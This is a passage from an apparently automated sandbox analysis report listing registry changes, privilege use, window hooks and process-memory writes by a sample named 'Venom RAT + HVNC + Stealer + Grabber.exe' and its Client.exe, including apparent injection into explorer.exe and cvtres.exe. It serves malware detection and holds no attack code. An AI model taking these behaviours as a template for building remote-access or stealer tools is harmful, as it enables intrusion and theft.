\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "12402" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\0\0\0 = 5a003100000000006159c39b10005265636f766572790000420009000400efbe6159c39b6159c39b2e00000002ae020000001a000000000000000000000000000000f1f05f005200650063006f007600650072007900000018000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133727767258620983" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\0\0\0\NodeSlot = "10" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "7410" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Downloads" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1132" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133727767258620983" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1 = 7e003100000000006159e99a11004465736b746f7000680009000400efbe47597d616159e99a2e0000003f5702000000010000000000000000003e0000000000de6b04004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "132" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000000000002000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0 = 8000310000000000f656fa46100056454e4f4d527e312e33285f0000640009000400efbe6159e89a6159e99a2e000000a3aa0200000019000000000000000000000000000000805a0f00560065006e006f006d005200410054002000760036002e0030002e003300200028002b0053004f005500520043004500290000001c000000 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\MRUListEx = 00000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\0 = 640031000000000061591c9b1000434c49454e547e3100004c0009000400efbe6159e89a6159c49b2e000000a5aa02000000190000000000000000000000000000001a69230043006c00690065006e007400730046006f006c00640065007200000018000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "165" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\0\0 = 5c003100000000006159c39b100031323730307e312e3100440009000400efbe61591c9b6159c49b2e0000003eac020000001a000000000000000000000000000000f1f05f003100320037002e0030002e0030002e003100000018000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\1\0\0\MRUListEx = ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e8005398e082303024b98265d99428e115f0000 explorer.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 3004 explorer.exe 3004 explorer.exe 6572 explorer.exe 3004 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 2988 explorer.exe 2988 explorer.exe 4928 chrome.exe 4928 chrome.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe 3228 Client.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 4976 7zFM.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 3004 explorer.exe 2988 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe 4928 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4976 7zFM.exe Token: 35 4976 7zFM.exe Token: SeSecurityPrivilege 4976 7zFM.exe Token: SeDebugPrivilege 1808 Venom RAT + HVNC + Stealer + Grabber.exe Token: SeDebugPrivilege 3228 Client.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeShutdownPrivilege 3004 explorer.exe Token: SeCreatePagefilePrivilege 3004 explorer.exe Token: SeDebugPrivilege 2304 cvtres.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 2988 explorer.exe Token: SeCreatePagefilePrivilege 2988 explorer.exe Token: SeShutdownPrivilege 4928 chrome.exe Token: SeCreatePagefilePrivilege 4928 chrome.exe Token: SeShutdownPrivilege 4928 chrome.exe Token: SeCreatePagefilePrivilege 4928 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4976 7zFM.exe 4976 7zFM.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 3004 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe -
Suspicious use of SetWindowsHookEx 36 IoCs
pid Process 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 1808 Venom RAT + HVNC + Stealer + Grabber.exe 3228 Client.exe 4252 StartMenuExperienceHost.exe 3004 explorer.exe 3004 explorer.exe 2988 explorer.exe 3548 SearchHost.exe 2124 StartMenuExperienceHost.exe 2988 explorer.exe 2988 explorer.exe 2988 explorer.exe 3004 explorer.exe 3004 explorer.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 6572 explorer.exe 6572 explorer.exe 2988 explorer.exe 3004 explorer.exe 3004 explorer.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe 5504 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3228 wrote to memory of 3004 3228 Client.exe 98 PID 3228 wrote to memory of 3004 3228 Client.exe 98 PID 3228 wrote to memory of 4188 3228 Client.exe 99 PID 3228 wrote to memory of 4188 3228 Client.exe 99 PID 3228 wrote to memory of 4188 3228 Client.exe 99 PID 3228 wrote to memory of 4356 3228 Client.exe 100 PID 3228 wrote to memory of 4356 3228 Client.exe 100 PID 3228 wrote to memory of 4356 3228 Client.exe 100 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 3228 wrote to memory of 2304 3228 Client.exe 101 PID 2304 wrote to memory of 1724 2304 cvtres.exe 106 PID 2304 wrote to memory of 1724 2304 cvtres.exe 106 PID 2304 wrote to memory of 1724 2304 cvtres.exe 106 PID 3004 wrote to memory of 4928 3004 explorer.exe 120 PID 3004 wrote to memory of 4928 3004 explorer.exe 120 PID 4928 wrote to memory of 3420 4928 chrome.exe 121 PID 4928 wrote to memory of 3420 4928 chrome.exe 121 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5280 4928 chrome.exe 122 PID 4928 wrote to memory of 5308 4928 chrome.exe 123 PID 4928 wrote to memory of 5308 4928 chrome.exe 123 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 